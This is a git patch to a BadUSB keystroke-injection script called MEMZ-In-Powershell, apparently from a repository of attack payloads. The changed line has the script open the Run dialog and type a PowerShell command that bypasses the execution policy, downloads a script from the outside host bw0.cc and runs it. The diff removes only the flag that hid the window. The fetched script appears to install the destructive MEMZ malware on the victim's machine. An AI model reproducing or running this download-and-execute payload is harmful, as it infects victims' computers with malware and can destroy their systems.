From 26ed5157cbc27cdfd9f88822d335372c4e7ce40e Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 10:57:02 +0000 Subject: [PATCH] Update MEMZ-In-Powershell.txt --- MEMZ-In-Powershell/MEMZ-In-Powershell.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/MEMZ-In-Powershell/MEMZ-In-Powershell.txt b/MEMZ-In-Powershell/MEMZ-In-Powershell.txt index d4f12eb..16cc322 100644 --- a/MEMZ-In-Powershell/MEMZ-In-Powershell.txt +++ b/MEMZ-In-Powershell/MEMZ-In-Powershell.txt @@ -11,7 +11,7 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C iex (irm bw0.cc/memz) +STRING powershell -Ep Bypass -C iex (irm bw0.cc/memz) ENTER